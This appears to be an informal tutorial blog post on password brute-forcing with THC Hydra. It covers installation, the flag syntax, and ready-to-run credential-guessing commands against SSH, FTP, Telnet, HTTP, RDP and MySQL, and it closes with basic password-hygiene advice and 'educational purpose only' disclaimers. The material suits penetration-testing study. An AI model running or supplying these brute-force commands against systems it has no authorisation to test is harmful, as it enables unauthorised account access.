Brute-force attack using THC Hydra

INTRODUCTION

Are you confident in the strength and security of your passwords? You’re completely wrong! There are a lot of ways to protect your password, but with the Password Cracker THC Hydra, you’re done. You can, however, employ cryptography to safeguard your password or at the very least make it tough to guess.

Hydra is a parallelized password cracker that can attack a variety of protocols. It’s quick and adaptable, and adding new modules is simple. Researchers and security consultants can use this program to demonstrate how simple it is to acquire unauthorized remote access to a system.

Hydra supports the following protocols:

• Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
• HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST,
• HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
• HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
• Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP,Rexec,
• Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3,SOCKS5,
• SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

$ git clone https://github.com/vanhauser-thc/thc-hydra
$ cd thc-hydra/
$ ./configure
$ make
$ make install

Hydra to work on Ubuntu/Debian users need to run

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
                libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
                firebird-dev libncp-dev

THC Hydra Commands

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

• –V vrebose mode
• –l login name
• –P <password_file/wordlist>
• –e nsr, additional checks, “n” for null password, “s” try login as pass, “r” try the reverse login as pass
• –t <number of paralel connects>
• –w <max time to wait for response>
• –f : exit after first login/password pair found
• –m : OPTIONS – module specific options. See hydra -U <module> what options are available.

Now ill show you the demo

🛑🛑🛑Caution this is only for educational purpose 🛑🛑🛑

hydra -V -f -t 4 -l test -P /root/wordlist ssh://victims ip address eg : 192.162.25.2

where:

• -V — to display a couple login+password
• -f — is a stop as soon as the password for login will be found;
• -P — is a path to the password dictionary;
• ssh://192.162.25.2 — is a service and victim IP address.

DONE

lets see other possibilities

FTP Example (WordList):

$ hydra -s 21 -V -l plague -P wordlist.txt -e s -t 10 -w 5 192.168.1.100 ftp

SSH Example(WordList):

$ hydra -s 22 -V -l plague -P wordlist.txt -t 10 -f 192.168.1.100 ssh

Telnet Example (WordList):

$ hydra -s 23 -V -l plague -P wordlist.txt -e ns -t 10 -w 5 -f -m 192.168.1.100 telnet

HTTP Login Example (WordList). For HTTPS set “https-get”:

$ hydra 192.168.1.1 http-get -v -V -l telekom -P wordlist.txt -e ns -t 5 -w 30 -m / -f

RDP Example (WordList):

$ hydra -t 4 -V -l plague -P wordlist.txt rdp://192.168.1.100

MySQL Example (WordList):

$ hydra -t 4 -V -f -l plague -e ns -P wordlist.txt 192.168.1.100 mysql

How to secure your self

• use hard to crack passwords;
• not to create passwords using personal data, for example birth date or name+birth date or phone number , Girlfriend name , ex names 😂😂😂😂😂;
• change password regularly;
• use different passwords for every accounts.
• use two-factor authentication;

USE THIS FOR EDUCATIONAL PURPOSE ONLY

If you have any question you can write in the comment

Thanks for Reading!

Cheers!